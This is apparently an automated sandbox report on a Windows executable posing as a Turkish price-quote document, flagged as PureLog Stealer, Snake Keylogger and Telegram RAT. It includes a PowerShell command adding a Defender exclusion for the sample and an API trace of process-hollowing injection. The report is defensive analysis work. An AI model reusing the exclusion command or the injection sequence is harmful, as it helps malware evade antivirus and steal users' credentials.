                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 9, 2025 16:40:19.374141932 CET697INHTTP/1.1 504 Gateway Time-out
                                          Date: Thu, 09 Jan 2025 15:40:19 GMT
                                          Content-Type: text/html
                                          Content-Length: 557
                                          Connection: keep-alive
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:10:40:00
                                          Start date:09/01/2025
                                          Path:C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                                          Imagebase:0xce0000
                                          File size:894'976 bytes
                                          MD5 hash:3E9B50DA2409B41170A088FC4BB0E5F1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1444231240.0000000009CD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1435443149.0000000004B73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:10:40:02
                                          Start date:09/01/2025
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                                          Imagebase:0x960000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:10:40:02
                                          Start date:09/01/2025
                                          Path:C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                                          Imagebase:0x370000
                                          File size:894'976 bytes
                                          MD5 hash:3E9B50DA2409B41170A088FC4BB0E5F1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:5
                                          Start time:10:40:02
                                          Start date:09/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6ee680000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:10:40:02
                                          Start date:09/01/2025
                                          Path:C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                                          Imagebase:0xf30000
                                          File size:894'976 bytes
                                          MD5 hash:3E9B50DA2409B41170A088FC4BB0E5F1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:12
                                          Start time:10:40:19
                                          Start date:09/01/2025
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 1520
                                          Imagebase:0x190000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:13.3%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:9.1%
                                            Total number of Nodes:186
                                            Total number of Limit Nodes:8
                                            execution_graph 27600 314a130 27605 314a15a 27600->27605 27601 314a1b5 27610 3149d44 27601->27610 27604 314a4a4 27605->27601 27605->27604 27606 3149d1c 27605->27606 27607 314b280 OutputDebugStringW 27606->27607 27609 314b32c 27607->27609 27609->27605 27611 314b378 CloseHandle 27610->27611 27613 314b408 27611->27613 27613->27604 27623 314e920 27625 314e947 27623->27625 27624 314ea24 27625->27624 27627 314e564 27625->27627 27628 314fdd8 CreateActCtxA 27627->27628 27630 314fede 27628->27630 27614 12901038 27615 129011c3 27614->27615 27616 1290105e 27614->27616 27616->27615 27619 12901310 PostMessageW 27616->27619 27621 12901308 PostMessageW 27616->27621 27620 129013bd 27619->27620 27620->27616 27622 129013bd 27621->27622 27622->27616 27549 3140848 27550 314085c 27549->27550 27551 3140898 27550->27551 27554 31461e3 27550->27554 27559 31483d9 27550->27559 27555 31461e9 27554->27555 27556 314620d 27555->27556 27564 3148027 27555->27564 27568 31482d8 27555->27568 27560 3148404 27559->27560 27561 314845d 27560->27561 27571 3149958 27560->27571 27575 3149929 27560->27575 27561->27550 27566 3148033 VirtualProtect 27564->27566 27567 3148391 27566->27567 27567->27556 27569 3148325 VirtualProtect 27568->27569 27570 3148391 27569->27570 27570->27556 27572 314996f 27571->27572 27579 314998f 27572->27579 27576 314996f 27575->27576 27578 314998f NtQueryInformationProcess 27576->27578 27577 3149983 27577->27560 27578->27577 27580 31499c0 27579->27580 27584 3149a00 27580->27584 27588 31499f0 27580->27588 27581 3149983 27581->27560 27585 3149a24 27584->27585 27586 3149a78 27585->27586 27592 31407f4 27585->27592 27586->27581 27589 3149a24 27588->27589 27590 3149a78 27589->27590 27591 31407f4 NtQueryInformationProcess 27589->27591 27590->27581 27591->27589 27593 3149c10 NtQueryInformationProcess 27592->27593 27595 3149cd7 27593->27595 27595->27585 27631 9f8e305 27636 9f8faa0 27631->27636 27653 9f8fb06 27631->27653 27671 9f8fa92 27631->27671 27632 9f8e314 27637 9f8faba 27636->27637 27642 9f8fac2 27637->27642 27688 12900261 27637->27688 27692 12900320 27637->27692 27697 1290065c 27637->27697 27701 129006bb 27637->27701 27705 1290029a 27637->27705 27710 12900a1a 27637->27710 27714 129001f6 27637->27714 27718 129005f5 27637->27718 27723 12900454 27637->27723 27727 129008b2 27637->27727 27732 129003cd 27637->27732 27739 1290018a 27637->27739 27743 12900349 27637->27743 27747 129004e1 27637->27747 27642->27632 27654 9f8fa94 27653->27654 27656 9f8fb09 27653->27656 27655 9f8fac2 27654->27655 27657 129008b2 2 API calls 27654->27657 27658 12900454 2 API calls 27654->27658 27659 129005f5 2 API calls 27654->27659 27660 129001f6 2 API calls 27654->27660 27661 12900a1a 2 API calls 27654->27661 27662 1290029a 2 API calls 27654->27662 27663 129006bb 2 API calls 27654->27663 27664 1290065c 2 API calls 27654->27664 27665 12900320 2 API calls 27654->27665 27666 12900261 2 API calls 27654->27666 27667 129004e1 2 API calls 27654->27667 27668 12900349 2 API calls 27654->27668 27669 1290018a 2 API calls 27654->27669 27670 129003cd 4 API calls 27654->27670 27655->27632 27657->27655 27658->27655 27659->27655 27660->27655 27661->27655 27662->27655 27663->27655 27664->27655 27665->27655 27666->27655 27667->27655 27668->27655 27669->27655 27670->27655 27672 9f8faba 27671->27672 27673 129008b2 2 API calls 27672->27673 27674 12900454 2 API calls 27672->27674 27675 129005f5 2 API calls 27672->27675 27676 129001f6 2 API calls 27672->27676 27677 9f8fac2 27672->27677 27678 12900a1a 2 API calls 27672->27678 27679 1290029a 2 API calls 27672->27679 27680 129006bb 2 API calls 27672->27680 27681 1290065c 2 API calls 27672->27681 27682 12900320 2 API calls 27672->27682 27683 12900261 2 API calls 27672->27683 27684 129004e1 2 API calls 27672->27684 27685 12900349 2 API calls 27672->27685 27686 1290018a 2 API calls 27672->27686 27687 129003cd 4 API calls 27672->27687 27673->27677 27674->27677 27675->27677 27676->27677 27677->27632 27678->27677 27679->27677 27680->27677 27681->27677 27682->27677 27683->27677 27684->27677 27685->27677 27686->27677 27687->27677 27689 12900202 27688->27689 27689->27688 27751 9f8d279 27689->27751 27755 9f8d280 27689->27755 27693 12900944 27692->27693 27759 9f8d370 27693->27759 27763 9f8d368 27693->27763 27694 1290095f 27698 12900682 27697->27698 27767 9f8db48 27697->27767 27771 9f8db40 27697->27771 27702 12900202 27701->27702 27703 9f8d279 ResumeThread 27702->27703 27704 9f8d280 ResumeThread 27702->27704 27703->27702 27704->27702 27706 12900660 27705->27706 27708 9f8db48 ReadProcessMemory 27706->27708 27709 9f8db40 ReadProcessMemory 27706->27709 27707 12900682 27708->27707 27709->27707 27711 12900202 27710->27711 27712 9f8d279 ResumeThread 27711->27712 27713 9f8d280 ResumeThread 27711->27713 27712->27711 27713->27711 27715 12900202 27714->27715 27716 9f8d279 ResumeThread 27715->27716 27717 9f8d280 ResumeThread 27715->27717 27716->27715 27717->27715 27719 129005fb 27718->27719 27720 12900766 27719->27720 27775 9f8d9e8 27719->27775 27779 9f8d9f0 27719->27779 27720->27642 27725 9f8d9e8 WriteProcessMemory 27723->27725 27726 9f8d9f0 WriteProcessMemory 27723->27726 27724 12900482 27724->27642 27725->27724 27726->27724 27728 1290089f 27727->27728 27729 12900766 27728->27729 27730 9f8d9e8 WriteProcessMemory 27728->27730 27731 9f8d9f0 WriteProcessMemory 27728->27731 27729->27642 27730->27728 27731->27728 27733 129003da 27732->27733 27734 12900202 27732->27734 27737 9f8d368 Wow64SetThreadContext 27733->27737 27738 9f8d370 Wow64SetThreadContext 27733->27738 27735 9f8d279 ResumeThread 27734->27735 27736 9f8d280 ResumeThread 27734->27736 27735->27734 27736->27734 27737->27734 27738->27734 27783 9f8dd78 27739->27783 27787 9f8dd70 27739->27787 27745 9f8d9e8 WriteProcessMemory 27743->27745 27746 9f8d9f0 WriteProcessMemory 27743->27746 27744 12900371 27744->27642 27745->27744 27746->27744 27791 9f8d8c8 27747->27791 27795 9f8d8d0 27747->27795 27748 12900503 27752 9f8d280 ResumeThread 27751->27752 27754 9f8d310 27752->27754 27754->27689 27756 9f8d2c4 ResumeThread 27755->27756 27758 9f8d310 27756->27758 27758->27689 27760 9f8d3b9 Wow64SetThreadContext 27759->27760 27762 9f8d431 27760->27762 27762->27694 27764 9f8d3b9 Wow64SetThreadContext 27763->27764 27766 9f8d431 27764->27766 27766->27694 27768 9f8db94 ReadProcessMemory 27767->27768 27770 9f8dc0c 27768->27770 27770->27698 27772 9f8db94 ReadProcessMemory 27771->27772 27774 9f8dc0c 27772->27774 27774->27698 27776 9f8d9f0 WriteProcessMemory 27775->27776 27778 9f8dad5 27776->27778 27778->27719 27780 9f8da3c WriteProcessMemory 27779->27780 27782 9f8dad5 27780->27782 27782->27719 27784 9f8ddff CreateProcessA 27783->27784 27786 9f8e054 27784->27786 27786->27786 27788 9f8dd78 CreateProcessA 27787->27788 27790 9f8e054 27788->27790 27790->27790 27792 9f8d8d0 VirtualAllocEx 27791->27792 27794 9f8d98c 27792->27794 27794->27748 27796 9f8d914 VirtualAllocEx 27795->27796 27798 9f8d98c 27796->27798 27798->27748 27596 9f75e28 27598 9f75e84 DrawTextExW 27596->27598 27599 9f75f35 27598->27599

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 323 31407f4-3149cd5 NtQueryInformationProcess 326 3149cd7-3149cdd 323->326 327 3149cde-3149d14 323->327 326->327
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 03149CC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: qMOW
                                            • API String ID: 1778838933-141267435
                                            • Opcode ID: 12790099bd5e44830b59f97287fe0d20a15da2769bbbc8669a1789b49de54572
                                            • Instruction ID: da66ec55113c4a0b7980201c4f8a25cac5f8172c180ac97d558b1b7491663739
                                            • Opcode Fuzzy Hash: 12790099bd5e44830b59f97287fe0d20a15da2769bbbc8669a1789b49de54572
                                            • Instruction Fuzzy Hash: 294154B9D042589FCB10CFAAD984A9EFBF5BB49310F14902AE918B7310D375A945CF68

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 330 3149c09-3149cd5 NtQueryInformationProcess 332 3149cd7-3149cdd 330->332 333 3149cde-3149d14 330->333 332->333
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 03149CC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: qMOW
                                            • API String ID: 1778838933-141267435
                                            • Opcode ID: 746a69a65915b928babe436d8c34ad4b47653d165b5999805c76b3ac12913281
                                            • Instruction ID: 95506b890664a35b73339a51841cda5b1572f2c1d759e102e2b6b696ea3455d9
                                            • Opcode Fuzzy Hash: 746a69a65915b928babe436d8c34ad4b47653d165b5999805c76b3ac12913281
                                            • Instruction Fuzzy Hash: 2E4157B9D042589FCF10CFA9D984ADEFBB5BB59310F24A02AE814B7310D335A946CF64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID: :+NB$[hL
                                            • API String ID: 2962429428-3337694584
                                            • Opcode ID: cdd8de237e1dbac9821458ebb74b11e2de2cb791085b8e98f8984ac9f7a9e1dd
                                            • Instruction ID: a4788fd659edf25e824a162081608d57eb5b6a727a1dfe53d0d78ff20b551c78
                                            • Opcode Fuzzy Hash: cdd8de237e1dbac9821458ebb74b11e2de2cb791085b8e98f8984ac9f7a9e1dd
                                            • Instruction Fuzzy Hash: 72B13670D45218CFDB28CFA5D9846ADBBB6FF8C300F2198A9D40ABB254DB359980CF54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: :+NB$[hL
                                            • API String ID: 0-3337694584
                                            • Opcode ID: 29d1f94a00ba5ccd0142f16ef113664851a8d0fe4d82eeb8c9158178a90f829f
                                            • Instruction ID: a27bd823694a1736e395312fe1a9764a04390abb1ea8614d86c9c63e19fbf7a0
                                            • Opcode Fuzzy Hash: 29d1f94a00ba5ccd0142f16ef113664851a8d0fe4d82eeb8c9158178a90f829f
                                            • Instruction Fuzzy Hash: 4AB13670D45218CFDB28CFA5C940AAEBBB6FF8C300F2594AAC406BB250DB359980CF55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: uE}$">EY
                                            • API String ID: 0-2935044547
                                            • Opcode ID: d65bef77c2174fb9ebb7355c11a903a031297fbc9b9047d0fb199af279fc8419
                                            • Instruction ID: 1754950bc8ceba523e16f5b93037e283fbda03f2638731a9f6b75e78d99ff7fb
                                            • Opcode Fuzzy Hash: d65bef77c2174fb9ebb7355c11a903a031297fbc9b9047d0fb199af279fc8419
                                            • Instruction Fuzzy Hash: 5B8124B4E01209DFDB48CFA5D5806AEFBB2FF88340F64846AC416AB354D7359A42CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \ lw
                                            • API String ID: 0-2684086738
                                            • Opcode ID: 0c9c13f8ad199a889fa8184474b99cd62740a35bb10231df30c126614fc7bf59
                                            • Instruction ID: 6b415c701448f917334b22f260b9e74154d516e68adf8d8dce8c43919140048c
                                            • Opcode Fuzzy Hash: 0c9c13f8ad199a889fa8184474b99cd62740a35bb10231df30c126614fc7bf59
                                            • Instruction Fuzzy Hash: 29B2C075E00628CFDB64DF69C984AD9BBB2FF89304F1581E9D509AB221DB319E85CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MLx
                                            • API String ID: 0-1359996642
                                            • Opcode ID: 582caaf6532a7fc0e1abe2b1e4fb7758636b4a960cfa4c2e6795356de18727a9
                                            • Instruction ID: cb06182bb00444d63afffc20d378d854aef325f1ff7e8d9be4da3c6e3de3805a
                                            • Opcode Fuzzy Hash: 582caaf6532a7fc0e1abe2b1e4fb7758636b4a960cfa4c2e6795356de18727a9
                                            • Instruction Fuzzy Hash: 42E13974E0420ADFDB08CFA9C4818AEFBB2FF89310B55C955D425AB214D734DA92CFA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MLx
                                            • API String ID: 0-1359996642
                                            • Opcode ID: b1ce8d93437912c8f7c11f94601424e5d8449321ff234c3c75289cbec683d319
                                            • Instruction ID: 87323c9319fe48b70dc0db9bc2dd2d97c465f60ac79e4fc22c1a2d9f92ba9e69
                                            • Opcode Fuzzy Hash: b1ce8d93437912c8f7c11f94601424e5d8449321ff234c3c75289cbec683d319
                                            • Instruction Fuzzy Hash: 55D11974E0020ADFDB08CF99C5818AEFBB2FF89350B15D959D425AB214D734DA92CFA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fw~
                                            • API String ID: 0-3679341647
                                            • Opcode ID: f0a0499ffa599d04cf4deae60f363cf11ffe1fdfdde0162a5002a9cdd29fc93d
                                            • Instruction ID: 467631720e2dde44deff14d1a9cfe669682e3a12c8eb60ed4762679d14586c11
                                            • Opcode Fuzzy Hash: f0a0499ffa599d04cf4deae60f363cf11ffe1fdfdde0162a5002a9cdd29fc93d
                                            • Instruction Fuzzy Hash: 48B13674E002488FDB08CFA9D984AEEFBB2EF8D310F18946AD915AB355D7349946CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fw~
                                            • API String ID: 0-3679341647
                                            • Opcode ID: f55031edf92e2ab47161de344a15e59765823586a4f0670bf089af4a3e040315
                                            • Instruction ID: 55185142448611468f08ca80adbb21e3eae577132d19e03218bfb8a95ecbd8fa
                                            • Opcode Fuzzy Hash: f55031edf92e2ab47161de344a15e59765823586a4f0670bf089af4a3e040315
                                            • Instruction Fuzzy Hash: DE81C174E002189FDB48CFAAD984AAEFBB2FF8D300F14942AD915AB354D7349945CF54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1447481114.0000000012900000.00000040.00000800.00020000.00000000.sdmp, Offset: 12900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_12900000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4bf98f638d1b666eb35ab62d7387614f162714ab6ad8f8a3b917c9fd6ec6c48
                                            • Instruction ID: bb4f7a3a35e2a7fc311d766193bf4b8503c8642196bd10b4bf868f46e84ace19
                                            • Opcode Fuzzy Hash: b4bf98f638d1b666eb35ab62d7387614f162714ab6ad8f8a3b917c9fd6ec6c48
                                            • Instruction Fuzzy Hash: AF329E71B012089FDB49DB69C860BAE77FAAF89704F2444ADE5459B3A0CB34ED05CB51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20748532b57893e5de04630bb2ac23e1c3fb4e4d7d7cd20082a4a293ab34251e
                                            • Instruction ID: 3c292b28e7131cf5c38aaddf997cff26dc6e2c51405c62108e448f441398344e
                                            • Opcode Fuzzy Hash: 20748532b57893e5de04630bb2ac23e1c3fb4e4d7d7cd20082a4a293ab34251e
                                            • Instruction Fuzzy Hash: EF221831A002198FDB24DF68C884BADF7B1FF48304F1495AAE84AEB355DB70A985CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbca8329544a0e4add19750ad7345fac17b76a16c40090067f0736a286fea224
                                            • Instruction ID: 7eabe2093c81d014c62ed5554d88237a07a543e2717cf24dcc0e7c68fc4e74b3
                                            • Opcode Fuzzy Hash: cbca8329544a0e4add19750ad7345fac17b76a16c40090067f0736a286fea224
                                            • Instruction Fuzzy Hash: A7511770E14759CBCB18DFA9C9405DDFBB6FF89300F24962AD419AB214EB306986CF41
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8da59581e9378df5d28672fa9ac11ca35ff1f62f51201b5fa972452256a00e7b
                                            • Instruction ID: f25c292734b2a8f834b8c792968904b202ca42b9017371183671e2c64eec2eae
                                            • Opcode Fuzzy Hash: 8da59581e9378df5d28672fa9ac11ca35ff1f62f51201b5fa972452256a00e7b
                                            • Instruction Fuzzy Hash: 0851F475E14719CBDB18DFA9C9505DDFBB2FF88300F24962AD419AB214EB70A992CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a080058a79cef330280a049139f4c9422615003506823d9b50b8cf7fdad9260
                                            • Instruction ID: e3bb9736c94047e75e8827f13ca4ead4ec4333014e86e3ec5c10efeb0f019791
                                            • Opcode Fuzzy Hash: 7a080058a79cef330280a049139f4c9422615003506823d9b50b8cf7fdad9260
